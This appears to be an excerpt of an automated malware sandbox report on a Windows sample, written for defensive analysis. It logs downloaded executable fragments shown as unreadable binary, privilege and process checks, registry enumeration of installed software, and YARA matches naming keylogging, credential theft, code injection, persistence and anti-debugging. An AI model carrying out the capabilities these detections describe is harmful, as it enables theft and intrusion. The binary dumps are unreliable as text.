InternetReadFile Dec. 11, 2023, 7:47 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $Ù1Cò_ò_ò_)n°ò_Ìò_ò^"ò_Ï^ò_Ï\ò_Ï[Óò_ÏZÑò_Ï_ò_Ï ò_Ï]ò_Richò_PEL(Á[à"!(`Ù@ ð@AgÏèr ð?°¬=`x8¸w@päÀc@.text&( `.dataH)@,@À.idata¬pD@@.didat4X@À.rsrcð Z@@.reloc¬=°>^@Bð¢ ¢¢à¢£0££p£0¤Ð£°£¤À¤p¤P¤°¤ð¤à¤0¥`¥ ¥¥P¥¦À¦ ¦`¦ §à§À§§°¨ð¨Ð¨ ¨À©ªà©°©àª ««Àª¬@¬ ¬à«P0®¥ ¥¢ ¢à¢ð¢£0£p££°£Ð£¤0¤P¤p¤°¤À¤à¤ð¤¥ ¥0¥P¥`¥¥ ¥`¦¦ ¦À¦§ §À§à§ ¨°¨Ð¨ð¨°©À©à©ªÀªàª« «à«¬ ¬@¬0P®0®°®À¯Ð°à°ð° ±À±²0²@²P²p²²Ð²P³³³ð³ ´0µµ°µÐµ¶P¶0··p¾¿ ÀàÅðÆ0Ð ÑÀÑàÑðÓÔÝ@ÞÐßàßààðæ0èPèÀêàêPïð ðò°òÐôðôpööû0ûÐûüàüPýþàþ`ÿÀÿÐÿðÿ`0` àÐP`°0P`Ð °Ðð 0`pÀ ° request_handle: 0x00cc0018	1	1
InternetReadFile Dec. 11, 2023, 7:47 p.m.	buffer: MZÿÿ¸@èº´ Í!¸LÍ!This program cannot be run in DOS mode. $ÀÅäÕ¤¤¤08e¤Ü¤¤¬¤ÖÌ¤ÖÌ¤ÖÌ¤ÖÌ¤ÖÌu¤ÖÌ¤Rich¤PEL(Á[à"!ÞÙð 0t(@Aàã ¸ú? 8¸ @´.textôÜÞ `.dataôðâ@À.idataä@@.rsrcê@@.reloc î@B0'à'`-à2@4p5°6(9ø9;0;À;<`= = >0>Q>>p?Ð?ð?À@pADàEJ@ZðZ [0[`[°[\\ \0\@\pe°eàefPj`jpjjjàj l0làlðmn0nPrÐrÐs`tÐtðtuuPuu°uvðvw w@w`ww x`\|}0}@}`}} }ÀÐàð0®À°ÀÐÀðÀ@Á Ò0Ò@ÒPÒàÓÔ ×Ð×°ØðØÙ@Û°Ü@Ý0ßß@ZX!fPjUnknown exception !fPjbad exceptionì!fPj8"fPj"fPjAccess violation - no RTTI data!Attempted a typeid of nullptr pointer!Bad read pointer - no RTTI data!Bad dynamic_cast!csmà 8t°api-ms-win-core-fibers-l1-1-1api-ms-win-core-synch-l1-2-0kernel32api-ms-ext-ms-FlsAlloc request_handle: 0x00cc0024	1	1
InternetReadFile Dec. 11, 2023, 7:47 p.m.	buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PELÔñ9bà"!V°/Ð íî @A¼cQ ,p °r ¸ 4C°Wh0 Ø·.textÑ `.rdataÿ0@@.data¸0 @À.00cfgP @@.tls` " @À.rsrc°p $ @@.reloc4C D. @BUåSWVìÎ]¡0 1èEðSèÄÇF9øs0ìEìD$\$<$ñè>ÆMð1éèÂðÄ^_[]ÂÙóør~WQSèJÄÆ;ëËÌÌÌÌÌÌÌUåSWVìEÀ¦MðYÁÉ¾ÿÿÿ¸#]ìxxÚÑê×÷ÿÿÿ9ûwhÚ9ÑÖCñF=sHÀPèÄÇEð]XpÆSÿuWè¸ÄÆMìùs4>ðÄ^_[]ÂøÜwF$ë1ÀHPèDÄx#çàGüëªèAùrHüÀü)Èø sÈPè¡QÄuðë¤1ÿ1öNésÿÿÿÿÔ ÌÌÌÌÌÌÌÌÌUåSWVÇÒÈ É¡Izþæþ¤ÉtNYöÃtFãþyç ÷yáþræ<zÉtv9çþ ÷zræþt^öÃurëÏzÉJ0^_[]Ããþ^r÷Ïzæþt&>Ïz1ë×ÇhH òÌ¹¶èkaÏzÇhH òÌ¹ èPaÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌUåSWVÇÒ·ÈJÉªIzþæþNÉtYöÃuÏzNÉJV0^_[]Ããþ^yç ÷yáþræ<zÉtdyçþ ÷zQræþt^öÃurë²ãþ^r÷Ïzæþt)~ÏzVqëÇhH òÌ¹¶èa`ÏzÇhH òÌ¹ èF`ÌÌÌÌÌUåSWVPÇÒröyÈNöÁáþYyÿt öG÷zç Ï~IJÉLqæþrÖæþyç ÷yz request_handle: 0x00cc0030	1	1
InternetReadFile Dec. 11, 2023, 7:48 p.m.	buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PEL&ò9bà"!6°à é @A4, S, È xT ¸° 8$& 0 . D.textÕ `.rdataÄ0@@.data<F@ & @À.00cfg ( @@.rsrcx * @@.reloc8$° &. @BUåhOè2ÄÀt8Ààð]ÃhàÿÿèÄ1À]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌUåWVEÀtu}UMÿt"òò0ë(hàÿÿè¿Ä¸ÿÿÿÿë&Ç4¦¦¦¦Ç0¦¦¦¦jVjjRQPèO¤Ä^_]ÃÌÌÌÌÌÌÌÌUåSWVhOèÄÀt0Ç8Ç1öçðtkEU]MÛtòò0ë%hàÿÿè2Ä1öë<Ç4¦¦¦¦Ç0¦¦¦¦jRjjPQWèÅ£ÄÀtÿ·8èäÄëþð^_[]ÃÌÌÌÌÌUåWVuöt }jVèÉ¨Äÿtÿ¶8è¨Ä^_]ÃUåSWVäøìPL$,M¡´@ 1èD$HÇD$4ùrÈàuy;}vhàÿÿé²hàÿÿé¨\|$,}uöÓøàøPèÄÀx\|$ òòD$8ÂÂD$$}WÁïVRèL$0Ä÷ß\|$01ÀÇD$ÇD$ÇD$ÇD$ÇD$ÇD$ÇD$1Ûëf.D$(ÀÃÿøñD$(Ã¿ëaD$fD$0D$8D$0D$9D$0D$:D$0D$;D$0D$<D$0D$=D$0D$>0\$?D$0øÀÇÃø,òùòD$@jD$<PjT$@RPÿt$@Îè¨ÄÂÀJÿÿÿòD$@òþÛñeÿÿÿD$þÀLÿÿÿD$þÀu]D$þÀufD$þÀuwD$þÀD$D$D$D$ÇD$ÇD$ÇD$ÇD$ÇD$éôþÿÿD$ÇD$éãþÿÿD$ÇD$ÇD$éÊþÿÿD$ÇD$ÇD$ÇD$ request_handle: 0x00cc003c	1	1
InternetReadFile Dec. 11, 2023, 7:48 p.m.	buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PEL'ò9bà"!ÌòÎ¡Þ@AtvSÇwð°Â¸À5hqà D{.textVÊÌ `.rdata¬à®Ð@@.data~@À.00cfg @@.rsrc°@@.reloc5À6@BUå¡Àtÿ ]ÿáh 6hÿè{ÄÀt¸ÿÿÿÿ]Ã¡ëÌUå¡ÀtHÿ ]ÿáh 6hÿè{ÄÀt1À]Ã¡ëÒÌÌÌÌÌÌUå¡Àt$ÿ ]ÿáh 6hÿè{ÄÀt¸ÿÿÿÿ]Ã¡ëÌUå¡ÀtHÿ ]ÿáh 6hÿè{ÄÀt¸ÿÿÿÿ]Ã¡ëÏÌÌÌUå¡ÀtHÿ ]ÿáh 6hÿè{ÄÀt¸ÿÿÿÿ]Ã¡ëÏÌÌÌUå¡ÀtHÿ ]ÿáh 6hÿè{ÄÀt¸ÿÿÿÿ]Ã¡ëÏÌÌÌUå¡Àt¨ÿ ]ÿáh 6hÿè{ÄÀt¸ÿÿÿÿ]Ã¡ëÌUå¡ÀtH(ÿ ]ÿáh 6hÿè{ÄÀt¸ÿÿÿÿ]Ã¡ëÏÌÌÌUå¡ÀtH,ÿ ]ÿáh 6hÿè{ÄÀt¸ÿÿÿÿ]Ã¡ëÏÌÌÌUå¡ÀtH4ÿ ]ÿáh 6hÿè{ÄÀt1À]Ã¡ëÒÌÌÌÌÌÌUå¡ÀtÀÿ ]ÿáh 6hÿè{ÄÀt1À]Ã¡ëÏÌÌÌUå¡ÀtH8ÿ ]ÿáh 6hÿè{ÄÀt1À]Ã¡ëÒÌÌÌÌÌÌUå¡ÀtH<ÿ ]ÿáh 6hÿè{ÄÀt]Ã¡ëÔÌÌÌÌÌÌÌÌUå¡ÀtH@ÿ ]ÿáh 6hÿè{ÄÀt¸ÿÿÿÿ]Ã¡ëÏÌÌÌUå¡ÀtHDÿ ]ÿáh 6hÿè{ÄÀt¸ÿÿÿÿ]Ã¡ëÏÌÌÌUå¡ÀtHHÿ ]ÿáh 6hÿè{ÄÀt1À]Ã¡ëÒÌÌÌÌÌÌ request_handle: 0x00cc0048	1	1
InternetReadFile Dec. 11, 2023, 7:48 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL"©,bv²à!ú àaÈ °nàÐ ¨ à; âÐ.text¬ `P`.data\|' (@`À.rdataDPF:@`@.bss( `À.edatan°,@0@.idataÐà¬@0À.CRT,ðº@0À.tls ¼@0À.rsrc¨ ¾@0À.relocà; <Ä@0B/48` @@B/19RÈp Ê @B/31]'@(Ð @B/45-p.ø @B/57\ &@0B/70#°2@B/81s:À<6@B/92Pr@BSìÇ$èó Ã$è¶Ï Û£¨ìa£¨ìat ÇÄ1À[ÃÄ¸[ÃWVSìT$$Òur¡ ìaÀè1Û5ãìa£ ìaëvÇ$èÿÖìºØð±¨ìaÀuá¡¨ìaøãÇ$è7ó ¸Ä[^_Âö¼'ú¸uäd¡1öX=ãìaëv9ÃÇ$èÿ×ìðð±¨ìaÀuÞ1Û¡¨ìaø!¡¨ìaÀñ¡¨ìaøÛË¡ìaÀtT$(ÇD$T$T$ $ÿÐì ìaÄ¸[^_Â1Àé7ÿÿÿö¼'¡¨ìa$è3Î ÀÆtA¡¨ìa$è Î Ãë9ÞwÀtóëÿÐ9Þvñ4$èèñ Ç¨ìaÇ¨ìa1ÀÇ¨ìa¨ìa¸Ä[^_Â»éÿÿÿf request_handle: 0x00cc0054	1	1

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Dec. 11, 2023, 7:16 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW Dec. 11, 2023, 7:16 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Repeatedly searches for a not-found process, you may want to run a web browser during analysis (6 events)

Time & API	Arguments	Status	Return	Repeated
Process32NextW Dec. 11, 2023, 7:48 p.m.	snapshot_handle: 0x00003550 process_name: svchost.exe process_identifier: 1264		0	0
Process32NextW Dec. 11, 2023, 7:48 p.m.	snapshot_handle: 0x00003588 process_name: svchost.exe process_identifier: 1264		0	0
Process32NextW Dec. 11, 2023, 7:48 p.m.	snapshot_handle: 0x000035c0 process_name: svchost.exe process_identifier: 1264		0	0
Process32NextW Dec. 11, 2023, 7:48 p.m.	snapshot_handle: 0x000035f8 process_name: svchost.exe process_identifier: 1264		0	0
Process32NextW Dec. 11, 2023, 7:48 p.m.	snapshot_handle: 0x00003630 process_name: svchost.exe process_identifier: 1264		0	0
Process32NextW Dec. 11, 2023, 7:48 p.m.	snapshot_handle: 0x00003668 process_name: svchost.exe process_identifier: 1264		0	0

Potentially malicious URLs were found in the process memory dump (3 events)

url	http://www.microsoft.com/schemas/ie8tldlistdescription/1.0
url	http://purl.org/rss/1.0/
url	http://www.passport.com

Yara rule detected in process memory (49 events)

description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Take ScreenShot	rule	ScreenShot
description	Escalate priviledges	rule	Escalate_priviledges
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Communications over HTTP	rule	Network_HTTP
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Run a KeyLogger	rule	KeyLogger
description	Create a windows service	rule	Create_Service
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communication using DGA	rule	Network_DGA
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Take ScreenShot	rule	ScreenShot
description	Escalate priviledges	rule	Escalate_priviledges
description	Steal credential	rule	local_credential_Steal
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Hijack network configuration	rule	Hijack_Network
description	Record Audio	rule	Sniff_Audio
description	Communications over HTTP	rule	Network_HTTP
description	Communications use DNS	rule	Network_DNS
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	File Downloader	rule	Network_Downloader
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Install itself for autorun at Windows startup	rule	Persistence
description	Communications over FTP	rule	Network_FTP
description	Run a KeyLogger	rule	KeyLogger
description	Communications over P2P network	rule	Network_P2P_Win

Queries for potentially installed applications (50 out of 67 events)

Time & API	Arguments	Status
RegOpenKeyExW Dec. 11, 2023, 7:48 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x00002dc8 options: 0 access: 0x00020119 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	1
RegOpenKeyExW Dec. 11, 2023, 7:48 p.m.	regkey_r: 7-Zip base_handle: 0x00002dc8 key_handle: 0x00002dcc options: 0 access: 0x00020119 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip	1
RegOpenKeyExW Dec. 11, 2023, 7:48 p.m.	regkey_r: AddressBook base_handle: 0x00002dc8 key_handle: 0x00002dcc options: 0 access: 0x00020119 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook	1
RegOpenKeyExW Dec. 11, 2023, 7:48 p.m.	regkey_r: Connection Manager base_handle: 0x00002dc8 key_handle: 0x00002dcc options: 0 access: 0x00020119 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager	1
RegOpenKeyExW Dec. 11, 2023, 7:48 p.m.	regkey_r: DirectDrawEx base_handle: 0x00002dc8 key_handle: 0x00002dcc options: 0 access: 0x00020119 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx	1
RegOpenKeyExW Dec. 11, 2023, 7:48 p.m.	regkey_r: Fontcore base_handle: 0x00002dc8 key_handle: 0x00002dcc options: 0 access: 0x00020119 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore	1
RegOpenKeyExW Dec. 11, 2023, 7:48 p.m.	regkey_r: HashTab base_handle: 0x00002dc8 key_handle: 0x00002dcc options: 0 access: 0x00020119 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\HashTab	1
RegOpenKeyExW Dec. 11, 2023, 7:48 p.m.	regkey_r: IE40 base_handle: 0x00002dc8 key_handle: 0x00002dcc options: 0 access: 0x00020119 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40	1
RegOpenKeyExW Dec. 11, 2023, 7:48 p.m.	regkey_r: IE4Data base_handle: 0x00002dc8 key_handle: 0x00002dcc options: 0 access: 0x00020119 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data	1
RegOpenKeyExW Dec. 11, 2023, 7:48 p.m.	regkey_r: IE5BAKEX base_handle: 0x00002dc8 key_handle: 0x00002dcc options: 0 access: 0x00020119 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX	1
RegOpenKeyExW Dec. 11, 2023, 7:48 p.m.	regkey_r: IEData base_handle: 0x00002dc8 key_handle: 0x00002dcc options: 0 access: 0x00020119 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData	1
RegOpenKeyExW Dec. 11, 2023, 7:48 p.m.	regkey_r: MobileOptionPack base_handle: 0x00002dc8 key_handle: 0x00002dcc options: 0 access: 0x00020119 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack	1
RegOpenKeyExW Dec. 11, 2023, 7:48 p.m.	regkey_r: Mozilla Firefox 105.0.1 (x64 en-US) base_handle: 0x00002dc8 key_handle: 0x00002dcc options: 0 access: 0x00020119 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 105.0.1 (x64 en-US)	1
RegOpenKeyExW Dec. 11, 2023, 7:48 p.m.	regkey_r: MozillaMaintenanceService base_handle: 0x00002dc8 key_handle: 0x00002dcc options: 0 access: 0x00020119 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService	1
RegOpenKeyExW Dec. 11, 2023, 7:48 p.m.	regkey_r: SchedulingAgent base_handle: 0x00002dc8 key_handle: 0x00002dcc options: 0 access: 0x00020119 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent	1
RegOpenKeyExW Dec. 11, 2023, 7:48 p.m.	regkey_r: WIC base_handle: 0x00002dc8 key_handle: 0x00002dcc options: 0 access: 0x00020119 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC	1
RegOpenKeyExW Dec. 11, 2023, 7:48 p.m.	regkey_r: {1AD147D0-BE0E-3D6C-AC11-64F6DC4163F1} base_handle: 0x00002dc8 key_handle: 0x00002dcc options: 0 access: 0x00020119 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1AD147D0-BE0E-3D6C-AC11-64F6DC4163F1}	1
RegOpenKeyExW Dec. 11, 2023, 7:48 p.m.	regkey_r: {26A24AE4-039D-4CA4-87B4-2F86417051FF} base_handle: 0x00002dc8 key_handle: 0x00002dcc options: 0 access: 0x00020119 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F86417051FF}	1
RegOpenKeyExW Dec. 11, 2023, 7:48 p.m.	regkey_r: {3160A0D4-A4F3-39B4-B4CC-B5306F9CF9B3} base_handle: 0x00002dc8 key_handle: 0x00002dcc options: 0 access: 0x00020119 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3160A0D4-A4F3-39B4-B4CC-B5306F9CF9B3}	1
RegOpenKeyExW Dec. 11, 2023, 7:48 p.m.	regkey_r: {50A2BC33-C9CD-3BF1-A8FF-53C10A0B183C} base_handle: 0x00002dc8 key_handle: 0x00002dcc options: 0 access: 0x00020119 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{50A2BC33-C9CD-3BF1-A8FF-53C10A0B183C}	1
RegOpenKeyExW Dec. 11, 2023, 7:48 p.m.	regkey_r: {90120000-0028-0412-1000-0000000FF1CE} base_handle: 0x00002dc8 key_handle: 0x00002dcc options: 0 access: 0x00020119 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-1000-0000000FF1CE}	1
RegOpenKeyExW Dec. 11, 2023, 7:48 p.m.	regkey_r: {90120000-002A-0000-1000-0000000FF1CE} base_handle: 0x00002dc8 key_handle: 0x00002dcc options: 0 access: 0x00020119 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002A-0000-1000-0000000FF1CE}	1
RegOpenKeyExW Dec. 11, 2023, 7:48 p.m.	regkey_r: {90120000-002A-0409-1000-0000000FF1CE} base_handle: 0x00002dc8 key_handle: 0x00002dcc options: 0 access: 0x00020119 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002A-0409-1000-0000000FF1CE}	1
RegOpenKeyExW Dec. 11, 2023, 7:48 p.m.	regkey_r: {90120000-002A-0412-1000-0000000FF1CE} base_handle: 0x00002dc8 key_handle: 0x00002dcc options: 0 access: 0x00020119 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002A-0412-1000-0000000FF1CE}	1
RegOpenKeyExW Dec. 11, 2023, 7:48 p.m.	regkey_r: {92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033 base_handle: 0x00002dc8 key_handle: 0x00002dcc options: 0 access: 0x00020119 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033	1
RegOpenKeyExW Dec. 11, 2023, 7:48 p.m.	regkey_r: {92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1042 base_handle: 0x00002dc8 key_handle: 0x00002dcc options: 0 access: 0x00020119 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1042	1
RegOpenKeyExW Dec. 11, 2023, 7:48 p.m.	regkey_r: {A5F504DF-2ED9-4A2D-A2F3-9D2750DD42D6} base_handle: 0x00002dc8 key_handle: 0x00002dcc options: 0 access: 0x00020119 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A5F504DF-2ED9-4A2D-A2F3-9D2750DD42D6}	1
RegOpenKeyExW Dec. 11, 2023, 7:48 p.m.	regkey_r: {EF1EC6A9-17DE-3DA9-B040-686A1E8A8B04} base_handle: 0x00002dc8 key_handle: 0x00002dcc options: 0 access: 0x00020119 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{EF1EC6A9-17DE-3DA9-B040-686A1E8A8B04}	1
RegOpenKeyExW Dec. 11, 2023, 7:48 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x00002dc8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	1
RegOpenKeyExW Dec. 11, 2023, 7:48 p.m.	regkey_r: AddressBook base_handle: 0x00002dc8 key_handle: 0x00002dcc options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook	1
RegOpenKeyExW Dec. 11, 2023, 7:48 p.m.	regkey_r: Connection Manager base_handle: 0x00002dc8 key_handle: 0x00002dcc options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager	1
RegOpenKeyExW Dec. 11, 2023, 7:48 p.m.	regkey_r: DirectDrawEx base_handle: 0x00002dc8 key_handle: 0x00002dcc options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx	1
RegOpenKeyExW Dec. 11, 2023, 7:48 p.m.	regkey_r: EditPlus base_handle: 0x00002dc8 key_handle: 0x00002dcc options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus	1
RegOpenKeyExW Dec. 11, 2023, 7:48 p.m.	regkey_r: ENTERPRISE base_handle: 0x00002dc8 key_handle: 0x00002dcc options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE	1
RegOpenKeyExW Dec. 11, 2023, 7:48 p.m.	regkey_r: Fontcore base_handle: 0x00002dc8 key_handle: 0x00002dcc options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore	1
RegOpenKeyExW Dec. 11, 2023, 7:48 p.m.	regkey_r: Google Chrome base_handle: 0x00002dc8 key_handle: 0x00002dcc options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome	1
RegOpenKeyExW Dec. 11, 2023, 7:48 p.m.	regkey_r: Haansoft HWord 80 Korean base_handle: 0x00002dc8 key_handle: 0x00002dcc options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean	1
RegOpenKeyExW Dec. 11, 2023, 7:48 p.m.	regkey_r: IE40 base_handle: 0x00002dc8 key_handle: 0x00002dcc options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE40	1
RegOpenKeyExW Dec. 11, 2023, 7:48 p.m.	regkey_r: IE4Data base_handle: 0x00002dc8 key_handle: 0x00002dcc options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data	1
RegOpenKeyExW Dec. 11, 2023, 7:48 p.m.	regkey_r: IE5BAKEX base_handle: 0x00002dc8 key_handle: 0x00002dcc options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX	1
RegOpenKeyExW Dec. 11, 2023, 7:48 p.m.	regkey_r: IEData base_handle: 0x00002dc8 key_handle: 0x00002dcc options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IEData	1
RegOpenKeyExW Dec. 11, 2023, 7:48 p.m.	regkey_r: MobileOptionPack base_handle: 0x00002dc8 key_handle: 0x00002dcc options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack	1
RegOpenKeyExW Dec. 11, 2023, 7:48 p.m.	regkey_r: SchedulingAgent base_handle: 0x00002dc8 key_handle: 0x00002dcc options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent	1
RegOpenKeyExW Dec. 11, 2023, 7:48 p.m.	regkey_r: WIC base_handle: 0x00002dc8 key_handle: 0x00002dcc options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\WIC	1
RegOpenKeyExW Dec. 11, 2023, 7:48 p.m.	regkey_r: {01B845D4-B73E-4CF7-A377-94BC7BB4F77B} base_handle: 0x00002dc8 key_handle: 0x00002dcc options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}	1
RegOpenKeyExW Dec. 11, 2023, 7:48 p.m.	regkey_r: {1D91F7DA-F517-4727-9E62-B7EA978BE980} base_handle: 0x00002dc8 key_handle: 0x00002dcc options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}	1
RegOpenKeyExW Dec. 11, 2023, 7:48 p.m.	regkey_r: {60EC980A-BDA2-4CB6-A427-B07A5498B4CA} base_handle: 0x00002dc8 key_handle: 0x00002dcc options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}	1
RegOpenKeyExW Dec. 11, 2023, 7:48 p.m.	regkey_r: {90120000-0015-0412-0000-0000000FF1CE} base_handle: 0x00002dc8 key_handle: 0x00002dcc options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}	1
